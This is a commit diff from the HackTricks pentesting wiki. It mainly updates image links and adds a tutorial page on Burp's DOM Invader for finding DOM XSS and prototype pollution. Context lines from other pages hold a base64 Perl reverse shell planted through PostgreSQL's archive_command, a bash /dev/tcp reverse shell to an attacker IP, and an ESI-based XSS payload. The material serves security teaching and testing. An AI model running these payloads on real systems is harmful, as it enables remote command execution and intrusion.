GITBOOK-3915: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-05-12 14:33:51 +00:00 committed by gitbook-bot
parent 1a404c88e7
commit b212998555
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
20 changed files with 130 additions and 17 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 39 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 39 KiB

After

Width:  |  Height:  |  Size: 78 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 78 KiB

After

Width:  |  Height:  |  Size: 38 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 60 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 60 KiB

After

Width:  |  Height:  |  Size: 220 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 220 KiB

After

Width:  |  Height:  |  Size: 329 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 329 KiB

After

Width:  |  Height:  |  Size: 45 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 53 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 53 KiB

After

Width:  |  Height:  |  Size: 91 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 91 KiB

After

Width:  |  Height:  |  Size: 316 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 316 KiB

After

Width:  |  Height:  |  Size: 29 KiB

View file

@ -600,6 +600,7 @@
* [Chrome Cache to XSS](pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md)
* [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
* [Dom Clobbering](pentesting-web/xss-cross-site-scripting/dom-clobbering.md)
* [DOM Invader](pentesting-web/xss-cross-site-scripting/dom-invader.md)
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
* [Misc JS Tricks & Relevant Info](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)

View file

@ -109,7 +109,7 @@ Open the SalseoLoader project using Visual Studio.
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
![](<../.gitbook/assets/image (4) (1) (1).png>)
![](<../.gitbook/assets/image (4) (1) (1) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
![](<../.gitbook/assets/image (5) (1) (1).png>)
![](<../.gitbook/assets/image (5) (1) (1) (2).png>)
### **Exit Visual Studio and execute DllExport\_configure**

View file

@ -76,7 +76,7 @@ fat_magic FAT_MAGIC
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
<figure><img src="../../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
@ -127,7 +127,7 @@ MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DY
Or using [Mach-O View](https://sourceforge.net/projects/machoview/):
<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
## **Mach-O Load commands**
@ -203,7 +203,7 @@ Example of **section header**:
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
<figure><img src="../../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
It's also possible to get **headers information** from the **command line** with:

View file

@ -15,7 +15,7 @@ Get Access Today:
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
@ -385,7 +385,7 @@ The **configuration file** of postgresql is **writable** by the **postgres user*
![](<../.gitbook/assets/image (303).png>)
#### **RCE with ssl_passphrase_command**
#### **RCE with ssl\_passphrase\_command**
The configuration file have some interesting attributes that can lead to RCE:
@ -409,13 +409,14 @@ While testing this I noticed that this will only work if the **private key file
**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.**
#### **RCE with archive_command**
#### **RCE with archive\_command**
Another attribute in the configuration file that is exploitable is `archive_command`.
For this to work, the `archive_mode` setting has to be `'on'` or `'always'`. If that is true, then we could overwrite the command in `archive_command` and force it to execute via the WAL (write-ahead logging) operations.
The general steps are:
1. Check whether archive mode is enabled: `SELECT current_setting('archive_mode')`
2. Overwrite `archive_command` with the payload. For eg, a reverse shell: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
3. Reload the config: `SELECT pg_reload_conf()`
@ -478,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
<figure><img src="../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owners permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
@ -542,7 +543,7 @@ RETURNS (result TEXT);
```
{% hint style="warning" %}
Note that for the previos query to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with&#x20;
Note that for the previos query to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with
```sql
CREATE EXTENSION dblink;
@ -567,7 +568,7 @@ SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
### **Custom defined function with** SECURITY DEFINER
****[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**:
\*\*\*\*[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**:
<pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
@ -665,7 +666,7 @@ The **password-based** authentication methods are **md5**, **crypt**, and **pass
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -40,7 +40,7 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
* Save changes
* Get the generated WebHook URL:
<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
* Call it with curl and you shuold receive the rev shell

View file

@ -100,7 +100,7 @@ Then, the attacker could use those **100 connections** to perform a **search bru
Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance:
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (3).png" alt=""><figcaption></figcaption></figure>
{% hint style="warning" %}
Note that in order to trigger the timeout it would be **enough to include the vulnerable LFI page**, so it enters in an eternal include loop.

View file

@ -7,7 +7,7 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
@ -206,7 +206,7 @@ The following will add a `Location` header to the response
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
```
<figure><img src="../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure>
#### CRLF in Add header (**CVE-2019-2438)**
@ -265,7 +265,7 @@ Check the XSLT page:
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -0,0 +1,111 @@
# DOM Invader
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## DOM Invader
DOM Invader is a browser tool installed in Burp's inbuilt browser. It assists in **detecting DOM XSS vulnerabilities** using various sources and sinks, including web messages and prototype pollution. The tool is preinstalled as an extension.
DOM Invader integrates a tab within the browser's DevTools panel enabling the following:
1. **Identification of controllable sinks** on a webpage for DOM XSS testing, providing context and sanitization details.
2. **Logging, editing, and resending web messages** sent via the `postMessage()` method for DOM XSS testing. DOM Invader can also auto-detect vulnerabilities using specially crafted web messages.
3. Detection of **client-side prototype pollution** sources and scanning of controllable gadgets sent to risky sinks.
4. Identification of **DOM clobbering vulnerabilities**.
### Enable It
In the Burp's builtin browser go to the **Burp extension** and enable it:
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
### Inject a Canary
In the previous image you can see a **random group of chars, that is the Canary**. You should now start **injecting** it in different parts of the web (params, forms, url...) and each time click search it. DOM Invader will check if the **canary ended in any interesting sink** that could be exploited.
Moreover, the options **Inject URL params** and Inject forms will automatically open a **new tab** **injecting** the **canary** in every **URL** param and **form** it finds.
### Inject an empty Canary
If you just want to find potential sinks the page might have, even if they aren't exploitable, you can **search for an empty canary**.
### Post Messages
DOM Invader allows testing for DOM XSS using web messages with features such as:
1. **Logging web messages** sent via `postMessage()`, akin to Burp Proxy's HTTP request/response history logging.
2. **Modification** and **reissue** of web messages to manually test for DOM XSS, similar to Burp Repeater's function.
3. **Automatic alteration** and sending of web messages for probing DOM XSS.
#### Message details
You can click each message to view more detailed information about it, including whether the `origin`, `data`, or `source` properties of the message are accessed by the client-side JavaScript.
* **`origin`** : If the **origin information of the message is not check**, you may be able to send cross-origin messages to the event handler **from an arbitrary external domain**. But if it's checked it still could be insecure.
* **`data`**: This is where the payload is sent. If this data is not used, the sink is useless.
* **`source`**: Evaluates if the source property, usually referencing an iframe, is validated instead of the origin. Even if this is checked, it doesn't assure the validation can't be bypassed.
#### Reply a message
1. From the **Messages** view, click on any message to open the message details dialog.
2. Edit the **Data** field as required.
3. Click **Send**.
### Prototype Pollution
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
If anything is found a **Test** button will appear to **test the found source**. Click on it, a new tab will appear, create an object in the console and check if the `testproperty` exists:
```javascript
let b = {}
b.testproperty
```
Once you found a source you can **scan for a gadget**:
1. From the **DOM** view, click the **Scan for gadgets** button next to any prototype pollution source that DOM Invader has found. DOM Invader opens a new tab and starts scanning for suitable gadgets.
2. In the same tab, open the **DOM Invader** tab in the DevTools panel. Once the scan is finished, the **DOM** view displays any sinks that DOM Invader was able to access via the identified gadgets. In the example below, a gadget property called `html` was passed to the `innerHTML` sink.
## DOM clobbering
In the previous image it's possible to see that DOM clobbering scan can be turned on. Once done, **DOM Invader will start searching for DOM clobbering vulnerabilities**.
## References
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling)
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-xss](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-xss)
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/web-messages](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/web-messages)
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution)
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>